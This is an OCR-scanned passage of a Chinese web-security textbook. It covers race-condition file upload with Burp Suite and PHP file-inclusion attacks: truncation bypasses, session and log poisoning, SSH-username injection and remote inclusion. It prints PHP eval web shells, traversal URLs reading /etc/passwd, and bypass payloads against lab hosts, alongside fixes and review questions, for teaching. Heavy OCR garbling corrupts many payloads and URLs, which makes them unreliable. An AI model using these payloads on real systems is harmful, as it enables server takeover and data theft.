件 漏洞 利用 成 功 ,就 会 生成 内 容 为 <?php@eval($_POST[123]);? 之 的 shell. php 
文件 。 


2. 利用 Burp Suite 实现 漏洞 攻击 过 程 

利用 Burp Suite 实现 漏洞 攻击 的 过 程 如 下 : 

(1) 利用 Burp Suite 的 Intruder 功能 不 断 发 送 上 传 文件 的 请 求 。 文 件 上 传 数据 包 如 
图 3-24 所 示 。 在 Payload type 下 拉 列 表 框 中 选择 Null payloads 选项 ,发 送 1000 次 文件 
上 传 请 求 ,如 图 3-25 所 示 。 


Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assid 


Attack type: ———Á | 


POST / HITP/1.1 

Host: 192. 168. 91. 142 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 
Accept: text/html, application/xhtml*xml, application/xml ;q=0. 9, */*, q-0. 8 
Accept-Language: zh-CN, zh; q=0. 8, en-US; q=0. 5, en; q=0. 3 

Accept-Encoding: gzip, deflate 

Content-Type: multipart/form-data; boundary---------------------------- 112573195729111 
Content-Length: 377 

Referer: http://192. 168. 91. 142/ 

onnection: keep-alive 

lÜpgrade-Insecure-Requests: 1 


wa 112573195729111 
Content-Disposition: form-data; name-"upfile^; filename-^w.php" 
Content-Type: application/octet-stream 


^, "w"), "<?php @eval(\$_POST[123]); 9"); ?> 
----112573195729111 
data; name-"submit^ 


——X 112573195729111-- 


3-24 Burp Suite 文件 上 传 数据 包 
(2) 与 此 同时 ,不断 访 问 上 传 的 文件 ,如果 访问 成 功 , 就 会 生成 shell 文件 。 文 件 请 求 
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(g) Payioad sets 
You can define one or more payload sets. The number of payload sets depends on the attack type defined i 
—— ete he 
MM mm ur 


(al) Payload Options [Null payloads] 
This payload type generates payloads whose value is an empty string. With no payload markers configured, 


re == 


@ Continue indefinitely 


Ë) Payload Processing 
You can define rules to perform various processing tasks on each payload before it is used. 


[2] Base64-encode 
— 


Ë Payload Encoding 


图 3-25 发送 1000 次 文件 上 传 请 求 


数据 包 如 图 3-26 所 示 。 在 Payload type 下 拉 列 表 框 中 选择 Null payloads 选项 ,发 送 
1000 次 文件 访问 请 求 , 如 图 3-27 所 示 。 


Payload Positions. 
Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which 


Ak — 


GET /up/w.php HITP/1. 1 

Host: 192. 168. 91. 142 

User-Agent: Mozilla/5. 0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 
Accept: text/html, application/xhtml-*xml, application/xml ;q=0. 9, */*; q-0. 8 
Accept-Language: zh-CN, zh; q70. 8, en-US; q70. 5, en; q70. 3 

Accept-Encoding: gzip, deflate 

Referer: http://192. 168. 91. 142/ 

Connection: keep-alive 

lUpgrade-Insecure-Requests: 1 


3-26 Burp Suite 文件 请 求 数据 包 


(3) 经 过 一 段 时间 ,发 现 已 经 成 功 访问 到 w. php 文件 ,而 且 也 生成 了 shell. php X 
件 ,如 图 3-28 所 示 。 
(4) shell. php 可 以 正常 解析 ,如 图 3-29 所 示 。 
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国 Payload sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined 


d MEL 
LIC m 


四 Payload Options [Null payloads] 


This payload type generates payloads whose value is an empty string. With no payload markers configurd 


ocn [S oes 


@ Continue indefinitely 


3-27 RÆ 1000 次 文件 访问 请 求 


[Request |Payoad [Statusi a| Eror |Timeout|Length | 
417 null 200 8 Ü 192 
540 null 200 g B 12 
810 null 200 B B 192 
943 null 200 B E 192 
1133 — mul 200 B B 192 
0 404 B B 466 
1 null 404 B Ü 4e 
2 null 404 B Ü 4e 
3 null 404 B B 46 
4 null 404 g Lj 466 


图 3-28 成 功 访问 到 了 w. php 文件 并 且 生 成 了 shell. php 文件 


httpy/192.168.91.142/up/shell.php 


EZ Enable Post data L] Enable Referrer 


123=phpinfo0; 


3-29 shell. php 可 以 正常 解析 
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39 ”文件 上 传 漏洞 修复 


文件 上 传 漏洞 主要 通过 以 下 几 种 方式 进行 修复 : 

CO 使 用 白 名 单 限制 文 件 上 传 的 类 型 。 

(2) 对 上 传 文件 进行 随机 重 命名 ,并 且 文 件 的 扩展 名 不 允许 用 户 自 定义 。 
(3) 对 保存 上 传 文件 的 文件 夹 进行 权限 限制 ,去 掉 脚本 的 执行 权限 。 
(4) 对 文件 的 内 容 进行 恶意 代码 检测 。 


310 思考 题 


. 什么 是 文件 上 传 漏洞 ? 它 有 哪些 危害 ? 

. 常见 的 文件 上 传 漏洞 的 利用 方式 有 哪些 ? 
. 前 端 JS 过 滤 绕 过 的 原理 是 什么 ? 

. 文件 名 过 滤 绕 过 的 原理 是 什么 ? 

. Content-Type 过 滤 绕 过 的 原理 是 什么 ? 
. 文件 头 过 滤 绕 过 的 原理 是 什么 ? 

. . htaccess 文件 上 传 的 原理 是 什么 ? 

. 文件 截断 上 传 的 原理 是 什么 ? 

- 竞争 条 件 文 件 上 传 的 原理 是 什么 ? 

10. 文件 上 传 漏洞 如 何 修 复 ? 


R= — 0 c» Q to — 
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4.1 ”文件 包含 漏洞 简介 


文件 包含 函数 的 参数 没有 经 过 过 滤 或 者 严格 的 定义 ,并 且 参 数 可 以 被 用 户 控 制 ,这 样 
就 可 能 包含 非 预 期 的 文件 。 如 果 文 件 中 存在 恶意 代码 ,无 论文 件 是 什么 类 型 ,文件 内 的 恶 
意 代 码 都 会 被 解析 并 执行 。 

文件 包含 漏洞 可 能 会 造成 服务 器 的 网 页 被 自 改 .网 站 被 挂 马 .服务器 被 远程 控制 ,被 
安装 后 门 等 危害 。 


42 文件 包含 漏洞 常见 函数 


服务 器 执行 代码 时 ,可 以 通过 文件 包含 函数 加 载 另 一 个 文件 的 代码 ,这 样 可 以 提高 开 
发 效率 。 例 如 , 当 开发 者 要 修改 页 眉 时 ,不 用 修改 每 个 页 面 的 代码 ,只 需要 修改 包含 文件 
的 代码 ,包含 此 文件 的 其 他 所 有 文件 的 页 眉 就 自动 改变 了 。 

PHP 中 的 文件 包含 函数 有 以 下 4 种 : 

(1) include。 包 含 并 运行 指定 文件 ,include 在 出 错时 产生 警告 (E_WARNING) , 脚 
本 会 继续 运行 。 

(2) include_once。 在 脚本 执行 期 间 包 含 并 运行 指定 文件 。 该 函数 和 include 函数 类 
似 。 两 者 唯一 的 区 别 是 : 使 用 该 函数 时 ,PHP 会 检查 指定 文件 是 否 已 经 被 包含 过 ,如 果 
是 , 则 不 会 再 次 包含 。 

(3) require。 包 含 并 运行 指定 文件 。require 在 出 错时 产生 E_COMPILE_ERROR 
级 别 的 错误 ,导致 脚本 中 止 运行 。 

(4) require_once。 它 和 require 函数 完全 相同 。 两 者 唯一 区 别 是 : 使 用 该 函数 时 ， 
PHP 会 检查 指定 文件 是 否 已 经 被 包含 过 ,如 果 是 , 则 不 会 再 次 包含 。 


43 文件 包含 漏洞 示例 代码 分 析 


文件 包含 漏洞 示例 代码 如 下 : 
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«?php 


$filename-$ GET['filename']; 


include ($filename); 
px 


在 以 上 代码 中 ,对 $_GET[L'filename'] 参 数 没 有 经 过 严格 的 过 滤 , 直 接 带 入 了 include 
函数 ,攻击 者 可 以 修改 $_GET[Yfilename'] 的 值 , 加 载 其 他 文件 ,执行 非 预期 的 操作 ,由 此 
造成 了 文件 包含 漏洞 。 


4.4 无 限制 本 地 文件 包含 漏洞 
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4.4.1 定义 及 代码 实现 


无 限制 本 地 文件 包含 漏洞 是 指 代码 中 没有 为 包含 文件 指定 特定 的 前 组 或 者 . php. 
.html 等 扩展 名 ,因此 攻击 者 可 以 利用 文件 包含 漏洞 读 取 操作 系统 中 的 其 他 文件 ,获取 人 敏 
感 信息 ,或 者 执行 其 他 文件 中 的 代码 。 


4.4.2 常见 的 敏感 信息 路 径 


利用 本 地 文件 包含 漏洞 可 以 获取 系统 本 地 的 其 他 文件 的 内 容 。 
A) Windows 系统 常见 敏感 文件 如 下 : 


c; Nboot. ini 

c: NxxxVphp. ini 

c; \xxx\my. ini 

c; \xxx\httpd. conf 

(2) Linux 系统 常见 敏感 文件 如 下 : 
/etc/passwd 

/ etc/ httpd/conf/httpd. conf 

/ etc/ my. conf 

/ usr/etc/php. ini 


443 漏洞 利用 


系统 版 本 信息 。 
PHP 配置 信息 。 
MySQL 配置 信息 。 
Apache 配置 信息 。 


Linux 系统 账号 信息 。 
Apache 配置 信息 。 
MySQL 配置 信息 。 
PHP 配置 信息 。 


1. 无 限制 本 地 文件 包含 漏洞 示例 代码 
无 限制 本 地 文件 包含 漏洞 示例 代码 如 下 : 


«?php 


$filename-$ GET['filename']; 


include ($filename); 
2 > 
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2. 读 取 文件 内 容 
通过 目录 遍历 可 以 获取 系统 中 /etc/passwd 文件 的 内 容 。 无 限制 本 地 文件 包含 漏洞 
测试 效果 如 图 4-1 所 示 。 


[ET 


D] trate Post datn [ trabe Relerrer E 
footx:0:oot/root/bin/bash binac1:1:bin:/bin:/sbin/nologin daemonzc2-Z-daemon;sbirz/sbin/nologin admoc3:4:adm/var/adm:/sbin/nologin Ip>c47:lp:/var/spool/Ipd:/sbin/nologin 
syncəc5:0:sync:/sbin:/bin/sync shutdownacé:Qcshutdown:/sbin:/sbin/shutdown haltx:7:0-hal-/sbin/sbin/halt mailx-8:12:mail/var/spool/mail/sbin/nologin uucp:x:10:14:uucp:;/var/spool 
“cp /bin/nologin operatora- tioperator/root/sbin/noiogin gamer 100 gamer us/games;^bin ood gopherar1330:gopher/var/gopher /sbin/nologin bac SOF TP 
Userjvar/ftp./sbin/nologin nobodyo-999-Nobody;//sbin/nologin vcsanc69.69virtual console memory owner./dev./sbin/nologin apachexx48:48:Apache:/var/www /sbin/nolocin. 
mysqlcz7:27:MySQL Server/var/lib/mysql/bin/bash sshdc74:74Privilege-separated SStévarenphy hi log 


图 4-1 无 限制 本 地 文件 包含 漏洞 测试 效果 


3. 利用 无 限制 本 地 文件 包含 漏洞 执行 代码 

利用 无 限制 本 地 文件 包含 漏洞 ,可 以 通过 文件 包含 功能 执行 任意 扩展 名 的 文件 中 的 
代码 。test. txt 文件 的 内 容 是 二 ?php phpinfo();? 过 ,利用 文件 包含 漏洞 包含 test. txt X 
件 , 就 可 以 执行 文件 中 的 PHP 代码 并 输出 phpinfo 信息 ,如 图 4-2 所 示 。 


http//127.00.1/cms/FI/FI.php?filename-test.txt 


C Postdata [] Referrer 4MK OxHEX IÐ Z XURL X^ Z BASE64 IB |/nsert string 
[Services | [No information available] 


4-2 利用 文件 包含 漏洞 执行 代码 的 效果 


“有 限制 本 地 文件 包含 漏洞 


4.5.1 定义 及 代码 实现 


有 限制 本 地 文件 包含 漏洞 是 指 代 码 中 为 包含 文件 指定 了 特定 的 前 缀 或 者 . php. 
. html 等 扩展 名 ,攻击 者 需要 绕 过 前 绥 或 者 扩展 名 过 滤 ,才能 利用 文件 包含 漏洞 读 取 操 作 
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系统 中 的 其 他 文件 ,获取 敏感 信息 。 常 见 的 有 限制 本 地 文件 包含 过 滤 绕 过 的 方式 主要 
# 7400 截断 文件 包含 .路 径 长 度 截 断 文件 包含 .点 号 截断 文件 包含 这 3 种 。 


4.5.2 %00 截 断 文 件 包含 


%00 会 被 认为 是 结束 符 , 后 面 的 数据 会 被 直接 忽略 ,导致 扩展 名 截断 。 攻 击 者 可 以 
利用 这 个 漏洞 绕 过 扩展 名 过 滤 。 


1. 漏洞 利用 条 件 
漏洞 利用 条 件 如 下 : 

(1) magic_quotes_gpc= off, 
(2) PHP 版 本 低 于 5.3.4, 


2. % 00 截断 文件 包含 示例 代码 
2600 截断 文件 包含 示例 代码 如 下 : 


«?php 
$filename-$ GET['filename']; 
include ($filename . ".html"); 
?» 


3. 测试 结果 
输入 以 下 测试 代码 : 


http://www.ctfs-wiki.com/FI/FI.php? filename-../../../../../.. 7. hse 
/../boot.ini$00 


通过 %00 截断 了 后 面 的 . html 扩展 名 过 滤 ,成 功 读 取 了 boot. ini 文件 的 内 容 ,%00 截断 
文件 包含 测试 效果 如 图 4-3 所 示 。 


ERE Tr 
Spun 
D sas 


L] Enable Post data [C] Enable Referrer 


[boot loader] timeout -30 default -multi(O)disk(o)rdisk(o)partition( WINDOWS [operating systems] multi(oxlisk(0yrdisk(partition(TNWINDOWS “Windows Server 2003, Enterprise" 
/noexecute-optout /fastdetect 


图 4-3 2600 截断 文件 包含 测试 效果 


453 ”路径 长 度 截断 文件 包含 


操作 系统 存在 最 大 路 径 长 度 的 限制 。 可 以 输入 超过 最 大 路 径 长 度 的 目录 ,这 样 系统 
就 会 将 后 面 的 路 径 丢弃 ,导致 扩展 名 截断 。 


1. 漏洞 利用 条 件 

Windows 下 目录 的 最 大 路 径 长 度 为 256B。 

Linux 下 目录 的 最 大 路 径 长 度 为 4096B。 
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2. 路 径 长 度 截断 文件 包含 示例 代码 
路 径 长 度 截断 文件 包含 示例 代码 如 下 : 


3. 测试 结果 
输入 以 下 测试 代码 


执行 完成 后 发 现 已 经 成 功 截断 了 后 面 的 . html 扩展 名 ,包含 了 test. txt 文件 。 路 径 
长 度 截断 文件 包含 测试 效果 如 图 4-4 所 示 。 


icemyFVRphp 
d SBitURL [filename=testoey 460004 000190440 p01 940A 
@ HHIH HALE THEFT EEHL HAMA AME ALME MEM LM TET OI 
Bore JHU 
C Enable Post data [ | Enable Referrer 


图 4-4 路 径 长 度 截断 文件 包含 测试 效果 
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454 点 号 截断 文件 包含 
点 号 截断 适用 于 Windows 系统 , 当 点 号 的 长 度 大 于 256B 时 ,就 可 以 造成 扩展 名 


1. 点 号 截断 文件 包含 示例 代码 
点 号 截断 文件 包含 示例 代码 如 下 : 


2. 测试 结果 
输入 以 下 测试 代码 : 


发 现 已 经 成 功 截断 了 后 面 的 . html 扩展 名 ,包含 了 test txt 文件 。 点 号 截断 文件 包含 测 
试 效果 如 图 4-5 所 示 。 


pom rename ut 


n" 


C Enable Postdata [C] Enable Referrer 


4-5 点 号 截断 文件 包含 测试 效果 
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4.6 Session 文件 包含 


当 可 以 获取 Session 文件 的 路 径 并 且 Session 文件 的 内 容 可 控 时 ,就 可 以 通过 包含 
Session 文件 进行 攻击 。 


4.6.1 利用 条 件 


Session 文件 包含 的 利用 条 件 有 两 个 : 一 是 Session 的 存储 位 置 可 以 获取 ,二 是 
Session 内 容 可 控 。 

一 般 通 过 以 下 两 种 方式 获取 Session 的 存储 位 置 。 

CD 通过 phpinfo 的 信息 获取 Session 的 存储 位 置 。 

phpinfo 中 的 session. save_path 保存 的 是 Session 的 存储 位 置 。 通 过 phpinfo 的 信息 
获取 session. save path 为 /var/lib/php/session, 如 图 4-6 所 示 。 


PHPSESSID 
session.referer_check [no value | no value | 
session.save handler [files [files | 
session.save_path | /var/lib/php/session | /var/ib/php/session ] 
session.serialize handler [php [php | 
session.use_cookies fon |o" | 
session.use only cookies jo» |on | 


图 4-6 通过 phpinfo 的 信息 获取 Session 的 存储 位 置 


(2) 通过 猜测 默认 的 Session 存储 位 置 进行 尝试 。 
通常 在 Linux 中 Session 默认 存储 在 /var/lib/php/session 目录 下 ,如 图 4-7 所 示 。 


图 4-7 Session 默认 存储 位 置 


4.62 Session 文件 包含 示例 分 析 
Session 文件 包含 示例 代码 如 下 : 


<?php 
session start(); 
$ctfs-$ GET['ctfs']; 
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$ SESSION["username"]-$ctfs; 
€i 


此 代码 的 $ ctfs 变量 的 值 可 以 通过 GET 型 ctfs 参数 传人 。PHP 代码 会 将 获取 的 
GET 型 ctfs 变量 的 值 存 人 Session 中 。 攻 击 者 可 以 利用 GET 型 ctfs 参数 将 恶意 代码 写 
A Session 文件 中 ,然后 再 利用 文件 包含 漏洞 包含 此 Session 文件 ,向 系统 中 传人 恶意 
代码 。 


4.6.3 漏洞 分 析 


上 面 的 代码 满足 Session 文件 包含 的 两 点 要 求 : 

CD 此 代码 的 $ ctfs 变量 值 可 以 通过 GET 型 ctfs 参数 传人 ,PHP 代码 会 将 获取 的 
GET 型 ctfs 变量 的 值 存 人 Session 中 。 

(2) 此 代码 的 Session 存储 位 置 是 默认 的 /var/lib/php/session。 

当 访 问 http: //www. ctfs-wiki/Session. php? ctfs = ctfs 后 ,会 在 /var/lib/php/ 
session 目录 下 将 ctfs 传人 的 值 存储 到 Session 中 。 

Session 的 文件 名 以 sess_ 开 头 , 后 跟 Sessionid。Sessionid 可 以 通过 开发 者 模式 获 
取 , 如 图 4-8 Bro 。 


EZ ^|v] 高 党 全 部 A) ”区 分 大 小 写 (C) AINW 


* Hy € ) >= Ba HTML css Hk DOM HA | Cookies ~ 
i | Cookies - 过 滤器 - B (接受 第 三 方 cookie ) + 


内 容 i - 
akp79gfiedh13ho11i6f3sm6s6 


图 4-8 通过 开发 者 模式 获取 Sessionid 


通过 开发 者 模式 获取 Sessionid 为 akp79gfiedh13holli6f3sm6s6 ,所 以 Session 的 文 
件 名 为 sess_akp79gfiedh13holli6f3sm6s6 。 
在 服务 器 的 /var/lib/php/session 目录 下 查看 存在 此 文件 ,内 容 为 username s:4: 


"ctfs", 


[root8c21336db4482 session]#cat sess akp79gfiedh13holli6f3sm6s6 
username |s:4:"ctfs" 


4.6.4 漏洞 利用 
通过 上 面 的 分 析 , 可 以 得 知 ctfs 传人 的 值 会 存储 到 Session 文件 中 ,如 果 存 在 本 地 文 
件 包含 漏洞 ,就 可 以 通过 ctfs 写 人 恶意 代码 到 Session 文件 中 ,然后 通过 文件 包含 漏洞 执 
行 恶 意 代码 getshell。 
当 访 问 http: //www. ctfs-wiki/session. php?ctfs=<?php phpinfo();? 放 后 ,会 在 
/var/lib/php/Session 目录 下 将 ctfs 传人 的 值 写 人 Session 文件 。 
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[root@6da845537b2 session]#cat sess 83317220159fc31cd7023422f64beala 
username|s:18:"<?php phpinfo();?>"; 


攻击 者 通过 phpinfo 或 者 猜测 能 获取 Session 存放 的 位 置 ,通过 开发 者 模式 可 获取 文 
件 名 称 , 然 后 通过 本 地 文件 包含 漏洞 解析 恶意 代码 getshell, 如 图 4-9 所 示 。 


he2.168.91.1 42:8080/fi.php?filename-/var/lib/php/session/sess 83317220159fc31cd7023422f64bea1a 


4-9 通过 Session 文件 包含 写 和 人 恶意 代码 


47 ”日志 文件 包含 


服务 器 中 的 中 间 件 .SSH 等 服务 都 有 记录 日 志 的 功能 。 如 果 开 启 了 记录 日 志 功 能 ， 
用 户 访问 的 日 志 就 会 存储 到 不 同 服务 的 相关 文件 中 。 如 果 日 志文 件 的 位 置 是 默认 位 置 或 
者 是 可 以 通过 其 他 方法 获取 ,就 可 以 通过 访问 日 志 将 恶意 代码 写 人 日 志文 件 中 ,然后 通过 
文件 包含 漏洞 包含 日 志 中 的 恶意 代码 ,获得 Web 服务 器 的 权限 。 比 较 典型 的 日 志文 件 包 
含有 两 种 : 中 间 件 日 志文 件 包含 和 SSH 日 志文 件 包 含 。 


4.7.1 中 间 件 日 志文 件 包 含 


中 间 件 日 志文 件 包含 漏洞 的 利用 条 件 是 : Web 中 间 件 日 志文 件 的 存储 位 置 已 知 , 并 
且 有 可 读 权 限 。 


下 面 介绍 中 间 件 日 志文 件 包 含 漏洞 的 利用 步骤 。 


1. 将 恶意 代码 写 入 日 志文 件 
中 间 件 开启 了 访问 日 志 记录 功能 ,会 将 访问 日 志 写 人 日 志文 件 中 。 访 问 以 下 URL: 


http://192.168.91.142/fi/index.php 
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发 现在 日 志文 件 中 写 人 了 如 下 信息 : 
[root@f507700ble7d fi]#less /var/log/httpd/access log 


192.168.91.1 -- [17/0ct /2018:12:26:45 +0000] "GET /fi/index.php HTTP/1.1" 200 
-"-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0" 


中 间 件 日 志文 件 会 记录 访问 者 IP 地 址 ,访问 时 间 访问 路 径 、 返 回 状态 码 等 信息 。 利 
用 中 间 件 记录 访问 路 径 到 日 志文 件 中 的 功能 ,将 恶意 代码 写 人 日 志文 件 中 。 
在 访问 的 路 径 中 添加 恶意 代码 天 ?php GevalC$. POST[123D 5? : 


http://192.168.91.142/fi/<?php Geval($ POST[123]);?» 


会 提示 404, 如 图 4-10 所 示 。 


WE) LoadURL |http://192.168.91.142/fi/<?php @eval($ POST[123];?» 


Ñ spiturL 
®© Execute 


[C Enable Post data [] Enable Referrer 


Not Found 


The requested URL /fi/< was not found on this server. 


Apache/2.2.15 (CentOS) Server at 192.168.91.142 Port 80 


图 4-10 网 站 返回 404 


再 查看 日 志文 件 ,内 容 如 下 : 

192.168.91.1 --[17/0ct/2018:12:30:11 +0000] "GET /fi/%3C? php% 20@eval ($_POST 
[123]);? $35E HTTP/1.1" 404 285 "- " "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55. 
0) Gecko/20100101 Firefox/55.0" 


虽然 访问 的 信息 已 经 写 人 了 日 志文 件 , 但 是 由 于 进行 了 URL 编码 ,导致 写 人 的 恶意 


代码 无 法 利用 。 
可 以 通过 Burp Suite 抓 包 的 方式 修改 浏览 器 编码 后 的 数据 包 ,这样 就 可 以 将 恶意 代 


码 写 人 日 志文 件 中 ,如 图 4-11 所 示 。 


ET /fi/<?php Geval($ POSI[123]); 7» HITP/1.1 


Host: 192. 168.91. 142 
Iser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 


em text/html, application/xhtml-*xml, application/xml ;q=0. 9, */*; q-0. 8 


iccept-Language: zh-CN, zh; q70. 8, en-US; q70. 5, en; q70. 3 
iccept-Encoding: gzip, deflate 

Eonnection: keep-alive 

Upgrade-Insecure-Requests: 1 


4-11 利用 Burp Suite 抓 包 将 恶意 代码 写 人 日 志文 件 


查看 日 志文 件 , 内 容 如 下 : 
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192.168.91.1 -- [17/0ct/2018: 12: 33:33 +0000] "GET /fi/«? php Geval($ POST 
[323]172> = 400 302 m nuum 


恶意 代码 成 功 写 人 日 志文 件 中 。 


2. 文件 包含 日 志文 


要 执行 日 志文 件 包含 ， 日 志文 件 的 位 置 。 常 见 的 中 间 件 日 志 都 有 默认 的 存 
储 位 置 , 例 如 ,CentOS 系统 Apache 中 间 件 的 日 志文 件 存储 在 /var/log/httpd/ 目 录 下 ,日 
志文 件 名 称 为 access_log。 

输入 以 下 测试 语句 : 


http://192.168.91.142/fi/index.php?filename=../../../../../../../../../.. 
7 ed ede... ./../var/log/httpd/access log 


通过 POST 发 送 123— phpinfoO ; ,其 中 的 PHP 木马 代码 成 功 解析 并 执行 。 中 间 件 
日 志文 件 包含 成 功 的 效果 如 图 4-12 所 示 。 


A oad URL [WapWi9216891142indexphpyilename=/VVVNVAVAVAAAAAVVvaicg/httpdjaccess_ bg 


Ü spitURL 
© kecute 

E Enable Post data [] Enable Referrer 
Post data 123=phpinfo0; 


192.168.91.1 - - [17/0ct/2018:12:25:24 +0000] "GET /fi/index.php?filename- ./../.././../../.././etc/passwd HTTP/1.1" 200 938 *-" 
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55. 5 - - [17/0ct/2018:12:26:4! 


+0000] "GET /fi/index.php HTTP/1.1' 2( lozilla/5.0 (Windows NT 1 5.0) Gecko/20100101 
Firefox/55. 0" 192.168.91.1 - - [17/Oct/2018: 11 +0000] "GET PS IERODAS POST[123]);?%3E HTTP/1.1" 404 
285 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55. 0" 168. == 

/2018: 12:32: Bd 


412 ”中 间 件 日 志文 件 包含 成 功 的 效果 


472 SSH 日 志文 件 包 含 


SSH 日 志文 件 包含 的 漏洞 的 利用 条 件 是 : SSH 日 志 路 径 已 知 ,并 且 有 可 读 权限 。 
SSH 日 志文 件 的 默认 路 径 为 /var/log/auth. log. 
下 面 介 绍 中 间 件 日 志 包含 漏洞 的 利用 步骤 。 


1. 将 恶意 代码 写 入 日 志文 件 
SSH 服务 如 果 开 启 了 日 志 记录 功能 ,会 将 SSH 的 连接 日 志 记录 到 SSH 日 志文 件 
中 。 将 连接 的 用 户 名 设置 为 恶意 代码 ,用 命令 连接 服务 器 172. 17. 0. 1 的 SSH 服务 。 
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ssh "<? php @eval (\$ POST[123]);?»2"0172.17.0.1 


查看 日 志文 件 ,发 现 已 经 将 恶意 代码 写 人 日 志文 件 。 


root@ubuntu:~#cat /var/log/auth.log 

Oct 7 18:41:58 ubuntu sshd[26485]: Connection closed by 172.17.0.2 port 46470 
[preauth] 

Oct 7 19:11:02 ubuntu sshd[26495]: Invalid user <?php Geval($ POST[123]);?» 
from 172.17.0.2 

Oct 7 19:11:02 ubuntu sshd[26495]: input userauth request: invalid user «? 
php Geval($ POST[123]);?» [preauth] 

Oct 7 19:11:03 ubuntu sshd[26495]: Failed password for invalid user «? php @ 
eval($ POST[123]);?»from 172.17.0.2 port 46472 ssh2 

Oct 7 19:11:04 ubuntu sshd[26495]: Failed password for invalid user 

<?php Geval($ POST[123]);?» from 172.17.0.2 port 46472 ssh2 

Oct 7 19:11:04 ubuntu sshd [26495]: Connection closed by 172.17.0.2 port 46472 
[preauth] 


2. 文件 包含 日 志文 件 
输入 以 下 测试 语句 : 


http://192.168.91.142/f£i/index.php? filename- ../../../../../ .. / .. / 7. 
Vies eee eter ie mete ketes le Nari log auth, Log: 


通过 POST 发 送 123— phpinfoO ; ,其 中 的 PHP 木马 代码 成 功 解析 并 执行 。SSH H 
志文 件 包 含 成 功 的 效果 如 图 4-13 所 示 。 


Wü LoadURL |http://192.168.91.142/fi/index.php?filename=././././././-/-/-/-/-/-/./-//./-/-/.-/-/-/-/-Ivarfog/authlog 


Ü Split URL 
@ Execute 

E Enable Post data [ ] Enable Referrer 
Po dls 123=phpinfoO] 


Oct 7 18:41:58 ubuntu sshd[26485]: Connection closed by 172.17.0.2 port 46470 [preauth] Oct 7 19:11:02 ubuntu 
sshd[26495]: Invalid user 


可 
413 SSH 日 志文 件 包 含 成 功 的 效果 
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48 远程 文件 包含 


4.8.1 无 限制 远程 文件 包含 


无 限制 远程 文件 包含 是 指 包 含 文件 的 位 置 并 不 是 本 地 服务 器 ,而 是 通过 URL 的 形 
式 包 含 其 他 服务 器 上 的 文件 ,执行 文件 中 的 恶意 代码 。 

漏洞 利用 条 件 为 allow_url_fopen=on 和 allow_url_include=on, 

无 限制 远程 文件 包含 漏洞 示例 代码 index. php 文件 的 内 容 如 下 : 


<?php 
$filename-$ GET['filename']; 
include ($filename); 

T 


无 限制 远程 文件 包含 漏洞 测试 文件 php. txt 的 内 容 为 <?php phpinfoO ; 7>., 
在 正常 情况 下 访问 远程 服务 器 URL: 


http://192.168.91.133/FI/php.txt 


包含 在 php. txt 中 的 phpinfo 函数 不 会 被 当 作 PHP 代码 执行 ,但 是 通过 远程 文件 包 
含 漏洞 ,包含 在 php. txt 中 的 phpinfo 函数 就 会 被 当 作 PHP 代码 解析 并 执行 。 
经 过 测试 ,192. 168. 91. 133 服务 器 上 php. txt 中 的 PHP 代码 已 经 被 执行 。 


http://www.ctfs-wiki.com/FI/index.php? filename-http://192.168.91.133/FI/ 
php.txt 


无 限制 远程 代码 执行 效果 如 图 4-14 所 示 。 


局 LesduRL |htpy/mmwetk wikicom/FVFLgho ?Hlenome=http//192.168.91.133/FVphp tnt 
À sewn. 
[© teare 


C trable Post dota [O Enable Referrer 


4-14 无 限制 远程 代码 执行 效果 
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482 有 限制 远程 文件 包含 


有 限制 远程 文件 包含 是 指 当 代码 中 存在 特定 的 前 绥 或 者 . php.. html 等 扩展 名 过 滤 
时 ,攻击 者 需要 绕 过 前 级 或 者 扩展 名 过 滤 , 才 能 执行 远程 URL 中 的 恶意 代码 。 

示例 代码 如 下 : 

<?php 


include($ GET['filename'] . ".html"); 
dis 


有 限制 远程 文件 包含 效果 如 图 4-15 所 示 。 


W Ra 


re 


1 Enable Post data Dlina Flore 


Maring- iocludeihittp://192 163.3 Vphp.txt htmly: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htmVFVWFLphp on line 1 Warning: include(: Failed opening 
http://192.168.31.133/F1/php.txthtmr for inclusion (include path= /ust/share/pear/ust/share/php' in Narwww/htmyFVWFLphp on line 1 


图 4-15 有 限制 远程 文件 包含 效果 
通常 有 限制 远程 文件 包含 绕 过 可 通过 问号 、 井 号 .空格 3 种 方式 来 绕 过 。 


1. 问号 绕 过 
可 以 在 问号 (?) 后 面 添加 HTML 字符 串 , 问 号 后 面 的 扩展 名 . html 会 被 当 作 查 询 , 从 
而 绕 过 扩展 名 过 滤 。 


http://www.ctfs - wiki.com/FI/WFI.php? filename= http://192.168. 91.133/FI/ 
php.txt? 


问号 绕 过 远程 文件 包含 效果 如 图 4-16 所 示 。 


http://www.ctfs-wikicom/FIANFI.pho?filename=http-//192.168.91.133/F/php.bt? 


[l Enable Post data 口 Enable Referrer 


4-16 问号 绕 过 远程 文件 包含 效果 
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2. 井 号 绕 过 
可 以 在 井 号 (# ) 后 面 添加 HTML 字符 串 ,# 号 会 截断 后 面 的 扩展 名 . html, 从 而 绕 
过 扩展 名 过 滤 。 井 号 的 URL 编码 为 %23。 


http://www.ctfs- wiki.com/FI/WFI.php? filename= http://192.168. 91.133/FI/ 
php.txt$23 


井 号 绕 过 远程 文件 包含 效果 如 图 4-17 所 示 。 


httpa/www.ctfs-wiki.com/FI/WFI.php?filename-http://192.168.91.133/FU/php.txt9623 


[O Enable Post data [] Enable Referrer 


437 井 号 绕 过 远程 文件 包含 效果 


3. 空格 绕 过 
利用 Burp Suite fuzz 可 以 发 现 , 除了 ?和 # 以 外 ,空格 也 可 以 绕 过 ,如 图 4-18 所 示 。 


g 
o 
a 
g 
a 
a 
[s] 
a 
a 
a 
g 


TA 
Ë 8 8 8 8 8 8 8 dË 


图 4-18 Burp Suite fuzz 效果 
